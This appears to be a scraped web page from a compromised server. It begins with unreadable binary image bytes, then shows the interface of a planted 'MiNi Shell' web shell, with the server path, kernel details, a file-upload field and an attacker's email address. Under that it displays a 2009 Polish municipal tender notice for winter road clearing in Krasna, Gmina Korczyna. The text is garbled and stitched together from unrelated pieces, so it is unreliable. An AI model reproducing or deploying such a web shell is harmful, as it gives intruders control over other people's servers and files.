JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20091015/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20091015/361482-N-2009.html

<p class="kh_header"><b>Korczyna: Zimowe utrzymanie dróg gminnnych w sezonie zimowym 2009/2010 w miejscowości Krasna</b><br>
<b>Numer ogłoszenia: 361482 - 2009; data zamieszczenia: 15.10.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Korczyna , ul. Rynek 18a, 38-420 Korczyna, woj. podkarpackie, tel. 013 4354080, faks 013 4354096.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> korczyna.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zimowe utrzymanie dróg gminnnych w sezonie zimowym 2009/2010 w miejscowości Krasna.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest prowadzenie zimowego utrzymania dróg gminnych w sezonie zimowym 2009/2010 w miejscowości Krasna 
  Zakres prac :
  1) odśnieżanie dróg gminnych  oraz chodników
  2) usuwanie gołoledzi materiałem uszarstniającym na jezdniach ulic, dróg 
      gminnych oraz chodnikach powierzonym materiałem. 
Wykonawca we własnym zakresie dokonywał będzie załadunku powierzonych materiałów do likwidacji gołoledzi.

2. Wymagania dodatkowe w ramach przedmiotu zamówienia:

 1) za ewentualne szkody spowodowane podczas prac  na nieruchomościach 
     objętych  zamówieniem odpowiada Wykonawca..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.04.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:
  1) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
  2) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia,
  3) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie 
zamówienia,
  4) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art.24 ust.1i2 ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych (Dz.U z 2007r. Nr 223 poz. 1655 z późn. zm.). 
2. Z ubiegania się o udzielenie zamówienia publicznego wyklucza się: 
   1) wykonawców, którzy nie spełniają warunków udziału w postępowaniu o zamówienie publiczne, o których mowa w art.24 ust.1 i 2 ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych (Dz. U. z 2007r. Nr 223 poz. 1655 z późn. zm.),
  2) wykonawców, którzy złożyli nieprawdziwe informacje mające wpływ na wynik 
prowadzonego postępowania,
  3) wykonawców, którzy nie złożyli oświadczenia o spełnianiu warunków udziału w 
postępowaniu lub dokumentów potwierdzających spełnianie tych warunków.
3. Zamawiający na podstawie złożonych przez Wykonawcę dokumentów, o których mowa w pkt 7 SIWZ, dokona oceny spełniania tych warunków zgodnie z formułą (spełnia - nie spełnia)..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1/ formularz ofertowy z wykorzystaniem wzoru - załącznik nr 1 do niniejszej specyfikacji,
2/ oświadczenie Wykonawcy o spełnianiu warunków  wskazanych w art. 22 ust.1 Prawa zamówień publicznych i  nie podlega wykluczeniu z postępowania na podstawie art. 24 Prawa zamówień publicznych - według załącznika nr 2 do SIWZ 
3/ aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do 
ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do 
rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione  nie  
wcześniej niż 6 miesięcy przed  upływem terminu składania ofert,
4/ dokumenty potwierdzające uprawnienie do reprezentacji Wykonawcy przez osoby podpisujące ofertę, o ile nie wynikają z przepisów prawa lub innych dokumentów rejestrowych,
5/ umowę spółki cywilnej jeżeli wykonawca prowadzi działalność w formie spółki 
cywilnej, 
6/ zaświadczenie właściwego Urzędu Skarbowego potwierdzające, że Wykonawca  nie zalega z opłacaniem podatków lub zaświadczenie, że uzyskał zgodę na zwolnienie, odroczenie, rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji organu podatkowego, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
7/ zaświadczenie właściwego oddziału Zakładu  Ubezpieczeń Społecznych lub KRUS
potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie  
zdrowotne lub społeczne, wystawione nie wcześniej niż 3 miesiące przed upływem 
terminu składania ofert,
8/ wykaz sprzętu i urządzeń przewidzianych do wykonania zamówienia, jakimi dysponuje Wykonawca - załącznik nr 3 do SIWZ. Warunkiem Zamawiającego jest by Wykonawca wykazał dysponowanie wymaganym sprzętem do prowadzenia akcji zimowej od pierwszego dnia prowadzenia akcji zimowej do dnia zakończenia akcji zimowej. Wykonawca winien dysponować minimum następującym sprzętem:
1) ciągnik z pługiem jednostronnym lub dwustronnym o mocy nie mniejszej niż 70 kM,
2) rozsiewacz RCW-3,
3) ciągnik rolniczy lekki z pługiem umożliwiającym odśnieżanie chodników, 
9/ informację o co najmniej jednym zrealizowanym zamówieniu wykonanym w okresie ostatnich trzech  lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a  jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, polegającym na wykonaniu usług odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz dat wykonania i odbiorców. Do tej informacji należy dołączyć dokumenty potwierdzające, że usługi te zostały wykonane należycie, 
10/ oświadczenie o posiadaniu bazy magazynowej do składowania materiałów do 
likwidacji gołoledzi - podanie jej lokalizacji,
11/ Oświadczenie o terminie wykonania zamówienia:
  1) w sezonie zimowym 2009/2010 każdorazowo po uprzednim telefonicznym wydaniu dyspozycji przez upoważnionego pracownika Urzędu Gminy,
  2) czas do osiągnięcia gotowości od wydania dyspozycji do 1 godziny,
  3) zlecone prace muszą być wykonane w tym samym dniu,
  4) po zakończeniu zleconej pracy podanie informacji o realizacji zlecenia, w tym samym dniu do godz. 2200  lub do godz. 800 dnia następnego pod wskazane numery telefonów.

Zamawiający przed wyborem Wykonawcy dokona przeglądu sprzętu objętego wykazem.

Dokumenty składane są w oryginale  lub kserokopii poświadczonej za zgodność 
z oryginałem przez wykonawcę..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.korczyna.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Korczyna
ul. Rynek 18a, pokój nr 6,
38-420 Korczyna.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.10.2009 godzina 09:45, miejsce: Urząd Gminy Korczyna
ul. Rynek 18a, pokój nr 13,
38-420 Korczyna.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com